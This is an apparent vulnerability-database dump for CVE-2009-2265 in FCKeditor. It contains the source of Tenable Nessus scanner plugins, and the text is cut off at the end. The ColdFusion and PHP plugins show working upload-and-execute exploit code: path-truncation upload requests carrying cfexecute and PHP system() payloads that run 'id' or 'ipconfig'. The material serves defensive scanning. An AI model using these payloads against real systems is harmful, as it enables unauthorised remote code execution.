"cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2009-07-14T00:00:00", "title": "Adobe ColdFusion FCKeditor 'CurrentFolder' File Upload", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2265"], "modified": "2009-07-14T00:00:00", "cpe": ["cpe:/a:adobe:coldfusion"], "id": "COLDFUSION_FCKEDITOR_FILE_UPLOAD.NASL", "href": "https://www.tenable.com/plugins/nessus/39790", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\n\nif (description)\n{\n script_id(39790);\n script_version(\"1.30\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/25\");\n\n script_cve_id(\"CVE-2009-2265\");\n script_bugtraq_id(31812);\n script_xref(name:\"Secunia\", value:\"35747\");\n script_xref(name:\"EDB-ID\", value:\"16788\");\n\n script_name(english:\"Adobe ColdFusion FCKeditor 'CurrentFolder' File Upload\");\n script_summary(english:\"Tries to upload a file with ColdFusion code using FCKeditor.\");\n\n script_set_attribute( attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by an\narbitrary file upload vulnerability.\");\n script_set_attribute( attribute:\"description\", value:\n\"The version of Adobe ColdFusion running on the remote host is\naffected by an arbitrary file upload vulnerability. The installed\nversion ships with a vulnerable version of an open source HTML text\neditor, FCKeditor, that fails to properly sanitize input passed to\nthe 'CurrentFolder' parameter of the 'upload.cfm' script located under\n'/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm'.\n\nAn attacker can leverage this issue to upload arbitrary files and\nexecute commands on the remote system subject to the privileges of the\nweb server user id.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://ocert.org/advisories/ocert-2009-007.html\");\n script_set_attribute(attribute:\"see_also\",value:\"https://www.adobe.com/support/security/bulletins/apsb09-09.html\");\n script_set_attribute( attribute:\"solution\", value:\n\"Upgrade to version 8.0.1 if necessary and apply the patch referenced\nin the vendor advisory above.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2009-2265\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ColdFusion 8.0.1 Arbitrary File Upload and Execute');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(22);\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/07/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:adobe:coldfusion\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_MIXED_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"coldfusion_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80, 8500);\n script_require_keys(\"installed_sw/ColdFusion\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = 'ColdFusion';\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\n\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\n# key = command, value = arguments\ncmds = make_array();\ncmd_desc = make_array();\ncmd_pats = make_array();\nos = get_kb_item(\"Host/OS\");\n\n# decides which commands to run based on OS\n# Windows (or unknown)\nif (isnull(os) || 'Windows' >< os)\n{\n cmds['cmd'] = '/c ipconfig /all';\n cmd_desc['cmd'] = 'ipconfig /all';\n cmd_pats['cmd'] = 'Windows IP Configuration|(Subnet Mask|IP(v(4|6))? Address)[\\\\. ]*:';\n}\n\n# *nix (or unknown)\nif (isnull(os) || 'Windows' >!< os)\n{\n cmds['sh'] = '-c id';\n cmd_desc['sh'] = 'id';\n cmd_pats['sh'] = 'uid=[0-9]+.*gid=[0-9]+.*';\n}\n\n\npath = \"/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm\";\n\nfolder_name = str_replace(\n find:\".nasl\",\n replace:\"-\"+unixtime()+\".cfm\",\n string:SCRIPT_NAME\n );\n\nif(safe_checks())\n{\n url =\n path + \"/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/\" +\n folder_name + \"%0d\";\n\n res = http_send_recv3(port:port, method:\"GET\", item:dir+url, exit_on_fail: TRUE);\n\n # If it does and is not disabled...\n if (\n \"OnUploadCompleted\" >< res[2] &&\n \"file uploader is disabled\" >!< res[2]\n )\n {\n # Try to upload a file.\n bound = \"nessus\";\n boundary = \"--\" +bound;\n\n postdata =\n boundary + '\\r\\n' +\n # nb: the filename specified here is irrelevant.\n 'content-disposition: form-data; name=\"newfile\"; filename=\"nessus.txt\"\\r\\n'+\n 'content-type: text/plain\\r\\n' +\n '\\r\\n' +\n '<!-- test script created by ' + SCRIPT_NAME + '. -->\\r\\n' +\n boundary + \"--\"+ \"\\r\\n\";\n\n res = http_send_recv3(\n method : \"POST\",\n port : port,\n item : dir + url,\n data : postdata,\n add_headers : make_array(\n \"Content-Type\", \"multipart/form-data; boundary=\"+bound),\n exit_on_fail : TRUE\n );\n\n if(\n \"An exception occurred when performing a file operation copy\" >< res[2]\n &&\n folder_name + '\\\\r' >< res[2]\n )\n {\n if (report_verbosity > 1)\n {\n report =\n '\\n' +\n 'The remote ColdFusion install responded with the following error, while trying to upload a file : ' +\n res[2] + '\\n\\n' +\n 'Note that Nessus reported this issue only based on the error message because \\n' +\n 'safe checks were enabled for this scan.\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n }\n }\n}\nelse\n{\n timeout = get_read_timeout();\n http_set_read_timeout(timeout * 2);\n\n url =\n path + \"/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/\" +\n folder_name + \"%00\";\n\n res = http_send_recv3(port:port, method:\"GET\", item:dir+url, exit_on_fail: TRUE);\n\n # If it does and is not disabled...\n if (\n \"OnUploadCompleted\" >< res[2] &&\n \"file uploader is disabled\" >!< res[2]\n )\n {\n # Try to upload a file to run a command.\n bound = \"nessus\";\n boundary = \"--\" + bound;\n try_again = 0;\n\n foreach cmd (keys(cmds))\n {\n postdata =\n boundary + '\\r\\n' +\n # nb: the filename specified here is irrelevant.\n 'content-disposition: form-data; name=\"newfile\"; filename=\"nessus.txt\"\\r\\n' +\n 'content-type: text/plain\\r\\n' +\n '\\r\\n' +\n # nb: this script executes a command, stores the output in a variable,\n # and returns it to the user.\n '<cfsetting enablecfoutputonly=\"yes\" showdebugoutput=\"no\">\\r\\n' +\n '\\r\\n' +\n '<!-- test script created by '+ SCRIPT_NAME + '. -->\\r\\n' +\n '\\r\\n' +\n '<cfexecute name=\"' + cmd + '\" arguments=\"' +cmds[cmd] + '\" timeout=\"'+\n timeout + '\" variable=\"nessus\"/>\\r\\n' +\n '<cfoutput>#nessus#</cfoutput>\\r\\n' +\n boundary + '--\\r\\n';\n\n # Increment 'folder_name' in URL and in the set variable so that each\n # attempt will upload a unique file, otherwise exploit try to upload a\n # file that already exists and would then fail\n if (try_again > 0)\n {\n orig_url = url;\n orig_folder = folder_name;\n time = unixtime() + try_again;\n\n url = ereg_replace(pattern:\"-([0-9]+)\\.cfm\", replace:'-'+time+\".cfm\", string:url);\n folder_name = ereg_replace(pattern:\"-([0-9]+)\\.cfm\", replace:'-'+time+\".cfm\", string:folder_name);\n\n # Just in case, revert to original values\n if (empty_or_null(url)) url = orig_url;\n if (empty_or_null(folder_name)) folder_name = orig_folder;\n }\n\n res = http_send_recv3(\n method : \"POST\",\n port : port,\n item : dir + url,\n data : postdata,\n add_headers : make_array(\n \"Content-Type\", \"multipart/form-data; boundary=\"+bound),\n exit_on_fail : TRUE\n );\n\n attack_req = http_last_sent_request();\n\n # Figure out the location of the script to request for code execution\n pat = 'OnUploadCompleted\\\\( *0, *\"([^\"]+/' + folder_name + ')';\n foreach line (split(res[2], keep:FALSE))\n {\n matches = pregmatch(pattern:pat, string:line);\n if (matches) url2 = matches[1];\n }\n if (isnull(url2)) exit(1, \"Nessus was unable to extract the URL for the file uploaded to the \"+app+\" install at \"+install_url);\n\n # Now try to execute the script.\n res = http_send_recv3(port:port, method:\"GET\", item:url2, exit_on_fail: TRUE);\n if(egrep(pattern:cmd_pats[cmd], string:res[2]))\n {\n if (\"ipconfig\" >< cmd_desc[cmd]) line_limit = 10;\n else line_limit = 4;\n security_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n cmd : cmd_desc[cmd],\n line_limit : line_limit,\n request : make_list(attack_req, (install_url - dir)+url2),\n output : chomp(res[2]),\n rep_extra : '\\nNote: This file has not been removed by Nessus'+\n ' and will need to be\\nmanually deleted.'\n );\n exit(0);\n }\n try_again++;\n }\n }\n}\naudit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T10:05:40", "description": "FCKeditor is installed on the remote host. It is an open source HTML\ntext editor that is typically bundled with web applications such\nDokeos, GForge, Geeklog, and Xoops, although it can also be installed\non its own. \n\nThe installed version of the software fails to sanitize input passed\nto the 'CurrentFolder' parameter of the 'upload.php' script located\nunder 'editor/filemanager/connectors/php'. Provided PHP's\n'magic_quotes_gpc' setting is disabled, an attacker may be able to\nleverage this issue to upload arbitrary files and execute commands on\nthe remote system.", "edition": 29, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2009-07-15T00:00:00", "title": "FCKeditor 'CurrentFolder' Arbitrary File Upload", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2265"], "modified": "2009-07-15T00:00:00", "cpe": [], "id": "FCKEDITOR_CURRENTFOLDER_FILE_UPLOAD.NASL", "href": "https://www.tenable.com/plugins/nessus/39806", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39806);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2009-2265\");\n script_bugtraq_id(31812);\n script_xref(name:\"Secunia\", value:\"35747\");\n\n script_name(english:\"FCKeditor 'CurrentFolder' Arbitrary File Upload\");\n script_summary(english:\"Tries to upload a php file\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nan arbitrary file upload vulnerability.\" );\n\n script_set_attribute(attribute:\"description\", value:\n\"FCKeditor is installed on the remote host. It is an open source HTML\ntext editor that is typically bundled with web applications such\nDokeos, GForge, Geeklog, and Xoops, although it can also be installed\non its own. \n\nThe installed version of the software fails to sanitize input passed\nto the 'CurrentFolder' parameter of the 'upload.php' script located\nunder 'editor/filemanager/connectors/php'. Provided PHP's\n'magic_quotes_gpc' setting is disabled, an attacker may be able to\nleverage this issue to upload arbitrary files and execute commands on\nthe remote system.\" );\n\n script_set_attribute(attribute:\"see_also\", value:\"http://ocert.org/advisories/ocert-2009-007.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/archive/1/504721/100/0/threaded\" );\n\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to FCKeditor 2.6.4.1 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ColdFusion 8.0.1 Arbitrary File Upload and Execute');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(22);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/07/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_MIXED_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\nos = get_kb_item(\"Host/OS\");\nif(os && \"Windows\" >< os)\n{ \n cmd = \"'cmd /c ipconfig /all'\";\n patmatch = \"Windows IP Configuration\";\n} \nelse\n{\n cmd = \"id\";\n patmatch = \"uid=[0-9]+.*gid=[0-9]+.*\";\n}\n\n# Loop through various directories.\n# /extension/fckeditor/fckeditor - knowledgeroot\n# /lists/admin/FCKeditor - PHPlist\n# /main/inc/lib/fckeditor - Dokeos\n\nif (thorough_tests) dirs = list_uniq(make_list(\"/fckeditor\", \n \"/extension/fckeditor/fckeditor\", \n \"/lists/admin/FCKeditor\", \n \"/main/inc/lib/fckeditor\", \n\t\t \"/xampp\",\n cgi_dirs()));\nelse dirs = make_list(cgi_dirs());\n\nforeach dir (list_uniq(dirs))\n{ \n dir = string(dir, \"/editor/filemanager/connectors/php\");\n\n folder_name = str_replace(\n find:\".nasl\", \n replace:\"-\"+unixtime()+\".php\", \n string:SCRIPT_NAME\n );\n\n if (safe_checks())\n {\n url = string(\n dir, \"/upload.php?\",\n \"Command=FileUpload&\",\n \"Type=File&\",\n \"CurrentFolder=/\", folder_name, \"%2e\"\n );\n\n res = http_send_recv3(port:port, method:\"GET\", item:url);\n if (isnull(res)) exit(0);\n\n # If it does and is not disabled...\n if (\n \"OnUploadCompleted\" >< res[2] && \n \"file uploader is disabled\" >!< res[2]\n )\n {\n # Try to generate an error message while uploading a file.\n bound = \"nessus\";\n boundary = string(\"--\", bound);\n\n postdata = string(\n boundary, \"\\r\\n\", \n # nb: the filename specified here is irrelevant.\n 'Content-Disposition: form-data; name=\"NewFile\"; filename=nessus1.txt','\\r\\n',\n \"Content-Type: application/zip \\r\\n\",\n \"\\r\\n\",\n '<?php system(', cmd, \"); ?>\\r\\n\",\n\n boundary, \"--\", \"\\r\\n\"\n );\n\n req = http_mk_post_req(\n port : port,\n version : 11, \n item : url, \n add_headers : make_array(\n \"Content-Type\", \"multipart/form-data; boundary=\"+bound\n ),\n data : postdata\n );\n\n res = http_send_recv_req(port:port, req:req);\n if (isnull(res)) exit(0);\n \n if (\n egrep(pattern:\"OnUploadCompleted *\\( *0\",string:res[2]) &&\n string(folder_name, \".\") >< res[2]\n )\n {\n report = string(\n \"\\n\",\n \"The remote FCKeditor install responded with the following error, while trying to upload a file : \",\n \"\\n\\n\",\n res[2],\"\\n\\n\",\n \"Note that Nessus reported this issue only based on the error message because \\n\",\n \"safe checks were enabled for this scan.\\n\"\n );\n security_hole(port:port, extra:report);\n \n exit(0);\n }\n }\n }\n else\n {\n url = string(\n dir, \"/upload.php?\",\n \"Command=FileUpload&\",\n \"Type=File&\",\n \"CurrentFolder=/\", folder_name, \"%00\"\n );\n \n res = http_send_recv3(port:port, method:\"GET\", item:url);\n if (isnull(res)) exit(0);\n\n # If it does and is not disabled...\n if (\n \"OnUploadCompleted\" >< res[2] && \n \"file uploader is disabled\" >!< res[2]\n )\n {\n # Try to upload a file to run a command.\n bound = \"nessus\";\n boundary = string(\"--\", bound);\n\n postdata = string(\n boundary, \"\\r\\n\", \n # nb: the filename specified here is irrelevant.\n 'Content-Disposition: form-data; name=\"NewFile\"; filename=nessus1.txt','\\r\\n',\n \"Content-Type: application/zip \\r\\n\",\n \"\\r\\n\",\n '<?php system(', cmd, \"); ?>\\r\\n\",\n\n boundary, \"--\", \"\\r\\n\"\n );\n\n req = http_mk_post_req(\n port : port,\n version : 11, \n item : url, \n add_headers : make_array(\n \"Content-Type\", \"multipart/form-data; boundary=\"+bound\n ),\n data : postdata\n );\n\n res = http_send_recv_req(port:port, req:req);\n if (isnull(res)) exit(0);\n \n pat = string('OnUploadCompleted\\\\( *0, *\"([^\"]+/', folder_name, ')');\n url2 = NULL;\n matches = egrep(pattern:pat, string:res[2]);\n if (matches)\n {\n foreach match (split(matches, keep:FALSE))\n {\n item = eregmatch(pattern:pat, string:match);\n if (!isnull(item))\n {\n url2 = item[1];\n break;\n }\n }\n }\n if (isnull(url2)) exit(0);\n\n # Now try to execute the script.\n res = http_send_recv3(port:port, method:\"GET\", item:url2);\n if (isnull(res)) exit(0);\n\n if( egrep(pattern:patmatch, string:res[2]))\n { \n report = string(\n \"\\n\",\n \"Nessus was able to execute the command '\", cmd, \"' on the remote host,\\n\",\n \"which produced the following output :\\n\",\n \"\\n\",\n data_protection::sanitize_uid(output:res[2])\n );\n security_hole(port:port, extra:report);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:45:32", "description": "Vinny Guido discovered that multiple input sanitising vulnerabilities\nin Fckeditor, a rich text web editor component, may lead to the\nexecution of arbitrary code.", "edition": 26, "published": "2010-02-24T00:00:00", "title": "Debian DSA-1836-1 : fckeditor - missing input sanitising", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2265"], "modified": "2010-02-24T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:5.0", "p-cpe:/a:debian:debian_linux:fckeditor"], "id": "DEBIAN_DSA-1836.NASL", "href": "https://www.tenable.com/plugins/nessus/44701", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1836. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44701);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-2265\");\n script_bugtraq_id(31812);\n script_xref(name:\"DSA\", value:\"1836\");\n\n script_name(english:\"Debian DSA-1836-1 : fckeditor - missing input sanitising\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vinny Guido discovered that multiple input sanitising vulnerabilities\nin Fckeditor, a rich text web editor component, may lead to the\nexecution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1836\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the fckeditor package.\n\nThe old stable distribution (etch) doesn't contain fckeditor.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 1:2.6.2-1lenny1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ColdFusion 8.0.1 Arbitrary File Upload and Execute');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(22);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:fckeditor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"fckeditor\", reference:\"1:2.6.2-1lenny1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:07:31", "description": "This update removes the filemanager and _samples directories from the\nembedded FCKeditor, they contain code with know security\nvulnerabilities, even though that code couldn't be invoked when Moin\nwas used with the default settings. Moin was probably not affected,\nbut installing this update is still recommended as a security measure.\nCVE-2009-2265 is the related CVE identifier.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2009-07-20T00:00:00", "title": "Fedora 10 : moin-1.6.4-3.fc10 (2009-7761)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2265"], "modified": "2009-07-20T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:10", "p-cpe:/a:fedoraproject:fedora:moin"], "id": "FEDORA_2009-7761.NASL", "href": "https://www.tenable.com/plugins/nessus/39862", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-7761.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39862);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-2265\");\n script_bugtraq_id(31812);\n script_xref(name:\"FEDORA\", value:\"2009-7761\");\n\n script_name(english:\"Fedora 10 : moin-1.6.4-3.fc10 (2009-7761)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update removes the filemanager and _samples directories from the\nembedded FCKeditor, they contain code with know security\nvulnerabilities, even though that code couldn't be invoked when Moin\nwas used with the default settings. Moin was probably not affected,\nbut installing this update is still recommended as a security measure.\nCVE-2009-2265 is the related CVE identifier.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=509924\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026639.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8f21a4ea\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected moin package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ColdFusion 8.0.1 Arbitrary File Upload and Execute');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(22);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:moin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^10([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 10.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC10\", reference:\"moin-1.6.4-3.fc10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"moin\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:08:44", "description": " - Sat Apr 3 2010 Ville-Pekka Vainio <vpivaini AT\n cs.helsinki.fi> - 1.8.7-2\n\n - Fixes CVE-2010-0828 (rhbz#578801)\n\n - Thu Feb 18 2010 Ville-Pekka Vainio <vpivaini AT\n cs.helsinki.fi> - 1.8.7-1\n\n - Fixed major security issues in miscellaneous parts of\n moin\n\n -\n http://hg.moinmo.in/moin/1.8/raw-file/1.8.7/docs/CHANG\n ES\n\n - http://secunia.com/advisories/38444/\n\n - Fixes rhbz#565604\n\n - Mon Dec 28 2009 Ville-Pekka Vainio <vpivaini AT\n cs.helsinki.fi> - 1.8.6-1\n\n - 1.8.6, mostly bug fixes\n\n -\n http://hg.moinmo.in/moin/1.8/raw-file/1.8.6/docs/CHANG\n ES\n\n - Tue Sep 15 2009 